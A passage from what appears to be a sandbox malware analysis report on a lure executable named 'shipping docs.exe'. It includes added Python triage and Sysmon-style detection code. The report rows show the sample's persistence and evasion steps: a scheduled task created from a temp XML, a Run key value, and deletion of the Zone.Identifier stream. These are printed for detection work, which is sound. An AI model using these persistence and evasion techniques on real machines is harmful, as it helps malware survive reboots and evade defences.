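        while end + 1 < len(buf) and buf[end:end + 2] != b"\x00\x00":  # value runs to the next NUL unit
            end += 2
        value = buf[j:end].decode("utf-16-le", errors="replace")
        if value:
            names.append(value)
        pos = end


def mismatched_names(on_disk_name: str, buf: bytes) -> list:
    """OriginalFilename values that disagree with the name the file was delivered under."""
    return [n for n in original_filenames(buf) if n.lower() != on_disk_name.lower()]


def _vi_string(key: str, value: str) -> bytes:
    # Simplified VS_VERSIONINFO String entry (assumption): UTF-16LE key, NUL, pad to 4 bytes, UTF-16LE value, NUL
    k = key.encode("utf-16-le") + b"\x00\x00"
    k += b"\x00\x00" * (((4 - len(k) % 4) % 4) // 2)
    return k + value.encode("utf-16-le") + b"\x00\x00"


# Constructed stand-in for a dumped image: a version block naming the binary MajorRevision.exe
# (as in the report rows) followed by 64 KiB of seeded pseudo-random bytes playing the .text section.
_rng = random.Random(756232)
TEXT_SECTION = bytes(_rng.getrandbits(8) for _ in range(65536))
SAMPLE_IMAGE = (b"MZ" + b"\x00" * 62
                + _vi_string("OriginalFilename", "MajorRevision.exe")
                + _vi_string("InternalName", "V3VSkFfg")
                + TEXT_SECTION)


def triage(on_disk_name: str, image: bytes, text_section: bytes) -> dict:
    e = shannon_entropy(text_section)
    return {"text_entropy": round(e, 4), "packed": looks_packed(e),
            "original_filenames": original_filenames(image),
            "name_mismatch": mismatched_names(on_disk_name, image)}


if __name__ == "__main__":
    print(triage("shipping docs.exe", SAMPLE_IMAGE, TEXT_SECTION))
```

Neither indicator is proof on its own: legitimately packed installers score high on entropy, and renamed downloads mismatch OriginalFilename all the time. Together with a lure file name and a .NET COM descriptor they are a strong enough triage signal to detonate the sample, which is what the rest of this report does.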

                Boot Survival

                Source: C:\Users\user\Desktop\shipping docs.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp
                Source: C:\Users\user\Desktop\shipping docs.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VMqTMMD
                Source: C:\Users\user\Desktop\shipping docs.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VMqTMMD

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Users\user\Desktop\shipping docs.exe | File opened: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | File opened: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
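The process tree, the Boot Survival rows and the Zone.Identifier rows above describe one chain performed by one actor: schtasks.exe /Create with an /XML file under %TEMP% (the Sigma "Scheduled temp file as task from temp location" hit in the overview), an HKCU Run value named VMqTMMD, and deletion of the Zone.Identifier stream on the dropped VMqTMMD.exe so that the copy no longer carries the mark of the web. The following is an added example, not part of the report and not the project's own rules: three small Sysmon-style rules written in Python and a correlation step that flags an actor showing at least two of the three techniques. The events are constructed to mirror the report's rows using Sysmon field names (EventID 1 process create, 13 registry value set, 23/26 file delete); the Run value data is an assumption, since the report shows only the value name; and whether your file-delete telemetry records the ADS name at all is an assumption to verify in your own environment.

```python
import re
from collections import defaultdict

# Directories an unprivileged user can write to; a persistence entry written by or pointing at a
# binary here is the interesting case, an installer working from Program Files is not.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData\\(Roaming|Local\\Temp)|Desktop|Downloads)\\", re.I)
RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run\\"


def rule_schtasks_create_from_temp_xml(ev) -> bool:
    """Sysmon EID 1: schtasks.exe /Create ... /XML <file under %TEMP%>, the pattern in the process tree above."""
    if ev.get("EventID") != 1 or not ev.get("Image", "").lower().endswith("\\schtasks.exe"):
        return False
    cl = ev.get("CommandLine", "").lower()
    return "/create" in cl and "/xml" in cl and "\\appdata\\local\\temp\\" in cl


def rule_run_key_set_by_user_path_binary(ev) -> bool:
    """Sysmon EID 13: a Run value written either by, or pointing at, a binary in a user-writable directory."""
    if ev.get("EventID") != 13 or RUN_KEY not in ev.get("TargetObject", "").lower():
        return False
    return bool(USER_WRITABLE.search(ev.get("Image", "")) or USER_WRITABLE.search(ev.get("Details", "")))


def rule_mark_of_the_web_removed(ev) -> bool:
    """Assumption: file-delete telemetry names the stream, e.g. Sysmon EID 23/26 with a
    TargetFilename ending in ':Zone.Identifier'. Verify that in your own environment."""
    return ev.get("EventID") in (23, 26) and ev.get("TargetFilename", "").lower().endswith(":zone.identifier")


RULES = {
    "schtasks_create_from_temp_xml": rule_schtasks_create_from_temp_xml,
    "run_key_set_by_user_path_binary": rule_run_key_set_by_user_path_binary,
    "mark_of_the_web_removed": rule_mark_of_the_web_removed,
}


def evaluate(events) -> list:
    """All (rule name, event) pairs that fire."""
    return [(name, ev) for ev in events for name, rule in RULES.items() if rule(ev)]


def correlate(hits) -> dict:
    """Group hits by the acting image (the parent for the schtasks child) and keep actors showing
    at least two distinct techniques, which is the chain the report's sample performs."""
    by_actor = defaultdict(set)
    for name, ev in hits:
        actor = ev.get("ParentImage") if name == "schtasks_create_from_temp_xml" else ev.get("Image")
        by_actor[actor].add(name)
    return {actor: rules for actor, rules in by_actor.items() if len(rules) >= 2}


SID = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
# Constructed Sysmon-style events modelled on the report rows; the Run value data is an assumption,
# the report shows only the value name VMqTMMD.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "ParentImage": r"C:\Users\user\Desktop\shipping docs.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp"'},
    {"EventID": 13, "Image": r"C:\Users\user\Desktop\shipping docs.exe",
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\VMqTMMD",
     "Details": r"C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe"},
    {"EventID": 23, "Image": r"C:\Users\user\Desktop\shipping docs.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe:Zone.Identifier"},
    # benign noise: an admin task whose XML lives under Program Files, and a vendor installer's Run value
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /Create /TN "Backup" /XML "C:\Program Files\Backup\task.xml"'},
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\Vendor",
     "Details": r"C:\Program Files\Vendor\agent.exe"},
]

if __name__ == "__main__":
    for actor, rules in correlate(evaluate(EVENTS)).items():
        print(actor, "->", sorted(rules))
```

The schtasks rule alone is noisy on hosts where software updaters register tasks from XML, which is why the correlation keys on the actor image rather than on the schtasks child: the report shows all three behaviours coming from shipping docs.exe and its two dropped copies, and that combination is what separates this chain from an installer.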
                Source: C:\Users\user\Desktop\shipping docs.exe | Process information set: NOOPENFILEERRORBOX (this row appears 54 times in the report)
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
